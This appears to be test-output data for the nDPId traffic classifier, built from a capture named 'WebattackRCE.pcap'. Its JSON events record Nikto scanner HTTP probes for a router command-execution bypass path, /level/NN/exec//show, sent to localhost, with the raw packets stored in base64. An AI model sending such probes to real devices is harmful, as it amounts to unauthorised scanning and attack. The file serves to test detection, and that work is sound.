+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} 